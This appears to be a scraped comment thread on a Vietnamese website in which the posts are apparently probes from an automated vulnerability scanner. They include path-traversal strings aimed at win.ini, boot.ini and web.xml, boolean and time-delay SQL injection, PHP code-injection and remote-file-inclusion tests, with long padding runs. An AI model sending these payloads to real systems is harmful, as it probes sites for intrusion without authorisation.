.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

pmhktvpm
7/7/2019 11:13:00 PM

WEB-INF/web.xml

pmhktvpm
7/7/2019 11:13:07 PM

WEB-INF\web.xml

rrkuspjk
7/7/2019 11:13:45 PM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

rrkuspjk
7/7/2019 11:13:50 PM

1some_inexistent_file_with_long_name.jpg

rrkuspjk
7/7/2019 11:13:53 PM

Http://testasp.vulnweb.com/t/fit.txt

rrkuspjk
7/7/2019 11:13:54 PM

http://testasp.vulnweb.com/t/fit.txt?.jpg

rrkuspjk
7/7/2019 11:13:59 PM

testasp.vulnweb.com

rrkuspjk
7/7/2019 11:14:41 PM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

rrkuspjk
7/7/2019 11:14:43 PM

1some_inexistent_file_with_long_name.jpg

rrkuspjk
7/7/2019 11:14:45 PM

Http://testasp.vulnweb.com/t/fit.txt

rrkuspjk
7/7/2019 11:14:48 PM

http://testasp.vulnweb.com/t/fit.txt?.jpg

rrkuspjk
7/7/2019 11:14:50 PM

testasp.vulnweb.com

esbodqqm
7/7/2019 11:15:01 PM

)

esbodqqm
7/7/2019 11:15:09 PM

!(()&&!|*|*|

esbodqqm
7/7/2019 11:15:12 PM

^(#$!@#$)(()))******

rrkuspjk
7/7/2019 11:15:37 PM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

rrkuspjk
7/7/2019 11:15:39 PM

1some_inexistent_file_with_long_name.jpg

rrkuspjk
7/7/2019 11:15:43 PM

Http://testasp.vulnweb.com/t/fit.txt

pmhktvpm
7/7/2019 11:15:46 PM

../../../../../../../../../../windows/win.ini

esbodqqm
7/7/2019 11:15:47 PM

)

rrkuspjk
7/7/2019 11:15:48 PM

http://testasp.vulnweb.com/t/fit.txt?.jpg

esbodqqm
7/7/2019 11:15:50 PM

!(()&&!|*|*|

pmhktvpm
7/7/2019 11:15:51 PM

../../../../../../../../../../boot.ini

rrkuspjk
7/7/2019 11:15:53 PM

testasp.vulnweb.com

pmhktvpm
7/7/2019 11:15:55 PM

../../../../../../../../../../windows/win.ini.jpg

esbodqqm
7/7/2019 11:15:56 PM

^(#$!@#$)(()))******

ebvqvbya
7/7/2019 11:15:57 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

pmhktvpm
7/7/2019 11:16:00 PM

������������������������������������������������windows��win.ini

ebvqvbya
7/7/2019 11:16:02 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

pmhktvpm
7/7/2019 11:16:03 PM

................windowswin.ini

ebvqvbya
7/7/2019 11:16:05 PM

-1 OR 2+879-879-1=0+0+0+1 --

pmhktvpm
7/7/2019 11:16:06 PM

..\..\..\..\..\..\..\..\windows\win.ini

ebvqvbya
7/7/2019 11:16:07 PM

-1 OR 3+879-879-1=0+0+0+1 --

pmhktvpm
7/7/2019 11:16:09 PM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

ebvqvbya
7/7/2019 11:16:10 PM

-1 OR 3*2<(0+5+879-879) --

pmhktvpm
7/7/2019 11:16:12 PM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

pmhktvpm
7/7/2019 11:16:14 PM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

ebvqvbya
7/7/2019 11:16:15 PM

-1 OR 3*2>(0+5+879-879) --

pmhktvpm
7/7/2019 11:16:16 PM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

ebvqvbya
7/7/2019 11:16:18 PM

-1 OR 2+879-879-1=0+0+0+1

pmhktvpm
7/7/2019 11:16:21 PM

WEB-INF/web.xml

ebvqvbya
7/7/2019 11:16:23 PM

-1 OR 3+879-879-1=0+0+0+1

pmhktvpm
7/7/2019 11:16:26 PM

WEB-INF\web.xml

esbodqqm
7/7/2019 11:16:26 PM

)

ebvqvbya
7/7/2019 11:16:27 PM

-1 OR 3*2<(0+5+879-879)

esbodqqm
7/7/2019 11:16:28 PM

!(()&&!|*|*|

fmbwkqdw
7/7/2019 11:16:34 PM

Ý kiến của bạn

fmbwkqdw
7/7/2019 11:16:36 PM

'"()

ebvqvbya
7/7/2019 11:16:41 PM

-1 OR 3*2>(0+5+879-879)

rrkuspjk
7/7/2019 11:16:42 PM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

esbodqqm
7/7/2019 11:16:43 PM

^(#$!@#$)(()))******

ebvqvbya
7/7/2019 11:16:43 PM

-1' OR 2+649-649-1=0+0+0+1 --

rrkuspjk
7/7/2019 11:16:45 PM

1some_inexistent_file_with_long_name.jpg

ebvqvbya
7/7/2019 11:16:47 PM

-1' OR 3+649-649-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:16:51 PM

-1' OR 3*2<(0+5+649-649) --

rrkuspjk
7/7/2019 11:16:52 PM

Http://testasp.vulnweb.com/t/fit.txt

rrkuspjk
7/7/2019 11:16:54 PM

http://testasp.vulnweb.com/t/fit.txt?.jpg

ebvqvbya
7/7/2019 11:16:54 PM

-1' OR 3*2>(0+5+649-649) --

rrkuspjk
7/7/2019 11:16:55 PM

testasp.vulnweb.com

ebvqvbya
7/7/2019 11:16:57 PM

-1' OR 2+176-176-1=0+0+0+1 or 'M8J9d5LX'='

ebvqvbya
7/7/2019 11:17:00 PM

-1' OR 3+176-176-1=0+0+0+1 or 'M8J9d5LX'='

ebvqvbya
7/7/2019 11:17:02 PM

-1' OR 3*2<(0+5+176-176) or 'M8J9d5LX'='

ebvqvbya
7/7/2019 11:17:05 PM

-1' OR 3*2>(0+5+176-176) or 'M8J9d5LX'='

fmbwkqdw
7/7/2019 11:17:06 PM

Ý kiến của bạn

ebvqvbya
7/7/2019 11:17:13 PM

-1" OR 2+393-393-1=0+0+0+1 --

fmbwkqdw
7/7/2019 11:17:15 PM

'"()

ebvqvbya
7/7/2019 11:17:17 PM

-1" OR 3+393-393-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:17:19 PM

-1" OR 3*2<(0+5+393-393) --

ebvqvbya
7/7/2019 11:17:25 PM

-1" OR 3*2>(0+5+393-393) --

esbodqqm
7/7/2019 11:17:29 PM

)

esbodqqm
7/7/2019 11:17:32 PM

!(()&&!|*|*|

ebvqvbya
7/7/2019 11:17:33 PM

if(now()=sysdate(),sleep(51),0)/*'XOR(if(now()=sysdate(),sleep(51),0))OR'"XOR(if(now()=sysdate(),sleep(51),0))OR"*/

esbodqqm
7/7/2019 11:17:35 PM

^(#$!@#$)(()))******

ebvqvbya
7/7/2019 11:17:37 PM

(select(0)from(select(sleep(51)))v)/*'+(select(0)from(select(sleep(51)))v)+'"+(select(0)from(select(sleep(51)))v)+"*/

fmbwkqdw
7/7/2019 11:17:38 PM

Ý kiến của bạn

ebvqvbya
7/7/2019 11:17:41 PM

1 waitfor delay '0:0:51' --

fmbwkqdw
7/7/2019 11:17:42 PM

'"()

ebvqvbya
7/7/2019 11:17:44 PM

at1mNxp2'; waitfor delay '0:0:51' --

ebvqvbya
7/7/2019 11:17:51 PM

QixIdP49'); waitfor delay '0:0:17' --

ebvqvbya
7/7/2019 11:17:55 PM

JyzwFliP')); waitfor delay '0:0:17' --

rrkuspjk
7/7/2019 11:18:00 PM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

ebvqvbya
7/7/2019 11:18:00 PM

QQDn4zdg';select pg_sleep(17); --

fmbwkqdw
7/7/2019 11:18:04 PM

Ý kiến của bạn

rrkuspjk
7/7/2019 11:18:04 PM

1some_inexistent_file_with_long_name.jpg

ebvqvbya
7/7/2019 11:18:05 PM

joXqk7tI');select pg_sleep(17); --

fmbwkqdw
7/7/2019 11:18:07 PM

'"()

ebvqvbya
7/7/2019 11:18:10 PM

jz4lvOHD'));select pg_sleep(17); --

rrkuspjk
7/7/2019 11:18:16 PM

Http://testasp.vulnweb.com/t/fit.txt

esbodqqm
7/7/2019 11:18:17 PM

)

rrkuspjk
7/7/2019 11:18:18 PM

http://testasp.vulnweb.com/t/fit.txt?.jpg

rrkuspjk
7/7/2019 11:18:20 PM

testasp.vulnweb.com

esbodqqm
7/7/2019 11:18:26 PM

!(()&&!|*|*|

esbodqqm
7/7/2019 11:18:28 PM

^(#$!@#$)(()))******

fmbwkqdw
7/7/2019 11:18:32 PM

Ý kiến của bạn

fmbwkqdw
7/7/2019 11:18:37 PM

'"()

esbodqqm
7/7/2019 11:18:58 PM

)

fmbwkqdw
7/7/2019 11:19:03 PM

Ý kiến của bạn

esbodqqm
7/7/2019 11:19:05 PM

!(()&&!|*|*|

fmbwkqdw
7/7/2019 11:19:06 PM

'"()

esbodqqm
7/7/2019 11:19:10 PM

^(#$!@#$)(()))******

rrkuspjk
7/7/2019 11:19:26 PM

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

fmbwkqdw
7/7/2019 11:19:27 PM

Ý kiến của bạn

pmhktvpm
7/7/2019 11:19:28 PM

../../../../../../../../../../windows/win.ini

pmhktvpm
7/7/2019 11:19:31 PM

../../../../../../../../../../boot.ini

rrkuspjk
7/7/2019 11:19:33 PM

1some_inexistent_file_with_long_name.jpg

fmbwkqdw
7/7/2019 11:19:34 PM

'"()

pmhktvpm
7/7/2019 11:19:35 PM

../../../../../../../../../../windows/win.ini.jpg

pmhktvpm
7/7/2019 11:19:37 PM

������������������������������������������������windows��win.ini

pmhktvpm
7/7/2019 11:19:40 PM

................windowswin.ini

esbodqqm
7/7/2019 11:19:40 PM

)

rrkuspjk
7/7/2019 11:19:42 PM

Http://testasp.vulnweb.com/t/fit.txt

jccdhntr
7/7/2019 11:19:42 PM

;print(md5(acunetix_wvs_security_test));

esbodqqm
7/7/2019 11:19:42 PM

!(()&&!|*|*|

rrkuspjk
7/7/2019 11:19:44 PM

http://testasp.vulnweb.com/t/fit.txt?.jpg

pmhktvpm
7/7/2019 11:19:45 PM

..\..\..\..\..\..\..\..\windows\win.ini

jccdhntr
7/7/2019 11:19:46 PM

';print(md5(acunetix_wvs_security_test));$a='

esbodqqm
7/7/2019 11:19:47 PM

^(#$!@#$)(()))******

rrkuspjk
7/7/2019 11:19:48 PM

testasp.vulnweb.com

pmhktvpm
7/7/2019 11:19:49 PM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

jccdhntr
7/7/2019 11:19:51 PM

";print(md5(acunetix_wvs_security_test));$a="

pmhktvpm
7/7/2019 11:19:53 PM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

jccdhntr
7/7/2019 11:19:55 PM

${@print(md5(acunetix_wvs_security_test))}

pmhktvpm
7/7/2019 11:19:56 PM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

jccdhntr
7/7/2019 11:19:59 PM

${@print(md5(acunetix_wvs_security_test))}\

fmbwkqdw
7/7/2019 11:20:00 PM

Ý kiến của bạn

pmhktvpm
7/7/2019 11:20:02 PM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\